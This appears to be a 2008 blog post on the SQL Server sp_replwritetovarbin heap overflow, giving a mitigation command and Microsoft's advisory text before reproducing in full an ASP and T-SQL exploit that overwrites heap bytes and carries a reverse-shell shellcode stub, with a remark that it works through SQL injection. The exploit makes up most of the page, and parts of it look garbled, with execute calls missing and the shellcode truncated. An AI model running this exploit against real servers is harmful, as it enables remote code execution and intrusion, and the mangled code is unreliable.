There is code available to take advantage of the sp_replwritetovarbin heap overflow bug

In a default configuration, the sp_replwritetovarbin stored procedure is accessible by anyone. To disable this proc you can run this as an admin on the box

Before disabling this pro read BradC’s comment so that you do not break replication

execute master.dbo.sp_dropextendedproc 'sp_replwritetovarbin'

Microsoft is investigating new public reports of a vulnerability that could allow remote code execution on systems with supported editions of Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE), and Windows Internal Database (WYukon). Systems with Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are not affected by this issue.

Here are some more links

Here is the code someone emailed me to test for the exploit

// k`sOSe 12/17/2008
<%// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on port 4445),
// the change allows multiple shots 🙂
// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.

// Take a look at the comments in T-SQL

On Error Resume Next

// change this
UserName = "r00t"
Password = "t00r"

// ########################################### FIRST QUERY
SQL = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 3020						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_

"     /* First byte overwritten here. This is a random writable address */	"&_
"     SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							

// ########################################### SECOND QUERY
SQL2 = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 3097						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_

"     /* Second byte overwritten here */			"&_
"     SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							

// ########################################### THIRD QUERY
SQL3 = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 3021						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_

"     /* Third byte overwritten here */				"&_
"     SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							

// ########################################### FOURTH QUERY
SQL4 = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 2708						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  IF @counter = 108						"&_
"  BEGIN							"&_

"     /* this is the pointer we wrote - 0x38. It points to a CALL ECX */	"&_
"    SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_

"     /* realign code */						"&_
"    SET @buf = @buf + CHAR(0xe1)				"&_

"     /* realign the stack */					"&_
"    SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc)	"&_

"     /* jump ahead */						"&_
"    SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
"    SET @counter = @counter + 12				"&_
"    CONTINUE							"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_

"     /* Fourth byte overwritten here */			"&_
"     SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_

"     /* reverse shell on */			"&_
"     SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)
+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)		"&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							

Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")

phase = Request.Querystring("p")

if phase then
	if phase = 1 then SQL3, oConnection
		Set oConnection = Nothing
	elseif phase = 2 then SQL4, oConnection
		Set oConnection = Nothing
	end if
Else SQL, oConnection
	Set oConnection = Nothing
	Set oConnection = Server.CreateObject("ADODB.Connection")
	oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
	Set rs = Server.CreateObject("ADODB.Recordset") SQL2, oConnection
	Set oConnection = Nothing	

end if
